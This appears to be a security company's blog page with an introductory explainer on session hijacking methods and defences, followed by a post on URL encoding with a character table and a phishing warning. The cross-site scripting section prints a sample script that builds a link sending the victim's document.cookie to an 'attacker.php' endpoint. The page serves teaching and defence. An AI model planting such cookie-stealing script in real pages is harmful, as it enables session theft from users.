Session Hijacking

While working with codes, the biggest issues which comes in picture is the security. There are multiple ways to secure your code from known threats, one on them is session hijacking.

What is session hijacking?

Well, session hijacking, in simple words can be understood as someone else showing your ID card to enter inside your premises.

Every time, when a client connects with server, s/he is provided with a unique session ID. This session ID is used for all the communications between the user and server.

Session hijacking is a TCP security attack on user session over a network. This is generally called as man-in-middle attack, as someone sitting between the client and server looks for the session details and then presents herself / himself as the client to the server.

There are a few common methods of session hijacking

  • IP spoofing
  • Cross site scripting
  • Packet sniffing
  • Bind attack

IP Spoofing

Spoofing simply means pretending to be someone else. This is a technique used to gain unauthorized access to the computer with an IP address of a trusted host. In implementing this technique, attacker has to obtain the IP address of the client and inject his own packets spoofed with the IP address of client into the TCP session, so as to fool the server that it is communicating with the victim i.e. the original host.

Cross site scripting (XSS)

Attacker can also capture victim’s Session ID using XSS attack by using JavaScript. If an attacker sends a crafted link to the victim with the malicious JavaScript, when the victim clicks on the link, the JavaScript will run and completes the instructions made by the attacker.

 <SCRIPT type="text/javascript"> 
var adr = '../attacker.php?victim_cookie=' + escape(document.cookie);
</SCRIPT>

Packet sniffing

Packet sniffing is a way of session hijacking similar to IP spoofing. In this an attacker sniffs into the network and finds a way to get the session ID packets between a user and server. Once the session details is retrieve by the attacker, s/he hits the server with the same session details and pretends to be the actual client.

This can be done using tools like packet sniffer.

Attacker Sniffing for Session ID
Attacker using session ID to gain access

In the above figure, it can be seen that attack captures the victim’s session ID to gain access to the server by using some packet sniffers.

Blind Attack

If attacker is not able to sniff packets and guess the correct sequence number expected by server, brute force combinations of sequence number can be tried.

Security

To defend a network with session hijacking, a defender has to implement both security measures at Application level and Network level. Network level hijacks can be prevented by Ciphering the packets so that the hijacker cannot decipher the packet headers, to obtain any information which will aid in spoofing. This encryption can be provided by using protocols such as IPSec, SSL, SSH etc. Internet security protocol (IPSec) has the ability to encrypt the packet on some shared key between the two parties involved in communication. IPsec runs in two modes: Transport and Tunnel.
In Transport Mode only the data sent in the packet is encrypted while in Tunnel Mode both packet headers and data are encrypted, so it is more restrictive.

Session hijacking is a serious threat to Networks and Web applications on web as most of the systems are vulnerable to it.

At Network Level – You can implement SSL for allowing users to access website with https. You can add firewalls and add rules to secure you from attacks. The firewalls will also help you create tunnel for data transfer. You can use VPN for more secure network.

At Application Level – You can implement single session concept, this will ensure only a single session ID, that to from a single IP is accessing the server. You can reset sessions in a fixed interval of time and can encrypt all the data before sending it to client. Also, to prevent Cross site scripting(XSS), you can strip tags, can use X-XSS-Protection Header in your code, and multiple other options are there.

You can understand how to secure your network here

URL Encoding – Look before you hit any URL

It has been a common trend to send users a tiny URL in messages or emails for different purposes. Once you click on that URL, you are taken to the long / full URL. The full URL can be understood by understanding the concept of URL encoding.

A URL is composed from a limited set of characters belonging to the US-ASCII character set. These characters include digits (0-9), letters(A-Z, a-z), and a few special characters (“-“, “.”, “_”, “~”).

ASCII control characters (e.g. backspace, vertical tab, horizontal tab, line feed etc), unsafe characters like space, , <, >, {, } etc, and any character outside the ASCII charset is not allowed to be placed directly within URLs.

Moreover, there are some characters that have special meaning within URLs. These characters are called reserved characters. Some examples of reserved characters are ?, /, #, : etc. Any data transmitted as part of the URL, whether in query string or path segment, must not contain these characters.

One of the most frequent URL Encoded character you’re likely to encounter is space. The ASCII value of space character in decimal is 32, which when converted to hex comes out to be 20. Now we just precede the hexadecimal representation with a percent sign (%), which gives us the URL encoded value – %20.

The following table uses rules defined in RFC 3986 for URL encoding.

DecimalCharacterURL Encoding (UTF-8)
0NUL(null character)%00
1SOH(start of header)%01
2STX(start of text)%02
3ETX(end of text)%03
4EOT(end of transmission)%04
5ENQ(enquiry)%05
6ACK(acknowledge)%06
7BEL(bell (ring))%07
8BS(backspace)%08
9HT(horizontal tab)%09
10LF(line feed)%0A
11VT(vertical tab)%0B
12FF(form feed)%0C
13CR(carriage return)%0D
14SO(shift out)%0E
15SI(shift in)%0F
16DLE(data link escape)%10
17DC1(device control 1)%11
18DC2(device control 2)%12
19DC3(device control 3)%13
20DC4(device control 4)%14
21NAK(negative acknowledge)%15
22SYN(synchronize)%16
23ETB(end transmission block)%17
24CAN(cancel)%18
25EM(end of medium)%19
26SUB(substitute)%1A
27ESC(escape)%1B
28FS(file separator)%1C
29GS(group separator)%1D
30RS(record separator)%1E
31US(unit separator)%1F
32space%20
33!%21
34%22
35#%23
36$%24
37%%25
38&%26
39%27
40(%28
41)%29
42*%2A
43+%2B
44,%2C
45%2D
46.%2E
47/%2F
480%30
491%31
502%32
513%33
524%34
535%35
546%36
557%37
568%38
579%39
58:%3A
59;%3B
60<%3C
61=%3D
62>%3E
63?%3F
64@%40
65A%41
66B%42
67C%43
68D%44
69E%45
70F%46
71G%47
72H%48
73I%49
74J%4A
75K%4B
76L%4C
77M%4D
78N%4E
79O%4F
80P%50
81Q%51
82R%52
83S%53
84T%54
85U%55
86V%56
87W%57
88X%58
89Y%59
90Z%5A
91[%5B
92%5C
93]%5D
94^%5E
95_%5F
96`%60
97a%61
98b%62
99c%63
100d%64
101e%65
102f%66
103g%67
104h%68
105i%69
106j%6A
107k%6B
108l%6C
109m%6D
110n%6E
111o%6F
112p%70
113q%71
114r%72
115s%73
116t%74
117u%75
118v%76
119w%77
120x%78
121y%79
122z%7A
123{%7B
124|%7C
125}%7D
126~%7E
127DEL(delete (rubout))%7F

Now if you keep a note of all the above, you can interpret what the URL says. 

In general you see an URL in the following format :

https://vikashtech.com/abcd.php?q=hello%20world
In the above URL,
https suggests that the SSL certifier confirms that you are navigated on the correct server.
vikashtech.com is the domain name of website
abcd.php is the page that you are looking into
? means you are passing some values to the URL
q is the key (the index value through which the programming language will receive some values)
hello%20world is the value of the key q wherein %20 means a space

If you are receiving emails from unknown sources and are being offered some sort of benefits after filling up some form or after downloading some software, please ensure that the URL is correct and is good to go with, before you actually hit it.

These emails are generally sort to different sort of people pre targeted. If you or your organization is receiving such emails, please aware people for the same and get your network and emails filtered, as this can lead to a very big disaster. For any kind of network, email, organization IT setup you can feel free to get in touch with our team. We will ensure that your network and your organization is out of the security glitch.

Click here to connect with us today!